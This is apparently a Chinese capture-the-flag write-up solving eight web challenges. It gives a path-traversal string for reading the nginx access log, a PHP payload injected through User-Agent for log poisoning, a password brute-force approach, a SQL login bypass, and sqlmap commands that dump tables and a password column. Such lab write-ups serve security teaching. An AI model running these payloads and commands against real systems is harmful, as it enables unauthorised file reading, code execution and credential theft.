Checkme1-8 WP

由 ssnhy13 发布

Checkme1-8 WP

checkme01

$keys = base64_decode(urldecode($keys));
需要先将qsnctf字符进行base64编码才能使$keys=="qsnctf"判断成立。

输入即可得到flag

checkme02


发现什么也没有
我们尝试读取phpinfo();

搜索qsnctf即可得到flag

checkme03


打开发现还是文件包含
但是尝试使用?text=php://filter/read=convert.base64-encode/resource=index.php发现没用了

尝试读取日志

?text=../../../../../../../../../../../../../../../../var/log/nginx/access.log

从日志里可以看出会读取User-Agent所以直接使用hackbar修改User-Agent修改成<?php phpinfo();?>重新刷新

得到flag

checkme04


打开发现变量a要为字母,b要为数字。Md5相等就可以输出flag了

checkme05


强类型比较


输入即可得到flag

checkme06


打开题目发现给了一个list发现是一个字典
猜一下是要爆破了

爆破看到有一个返回包长度不同即是密码(自己爆破一下吧)

输入密码得到flag

checkme07

使用万能密码登陆即可得到flag

checkme08


将抓的包放到txt里面然后使用sqlmap
python sqlmap.py -r 1.txt –dbs
爆破数据库

python sqlmap.py -r 1.txt -D sql –tables
爆破表名

python sqlmap.py -r 1.txt -D sql -T user –columns
爆破列名

python sqlmap.py -r 1.txt -D sql -T user -C password –dump
查看password列数据即可得到flag

得到flag


0条评论

发表评论


验证码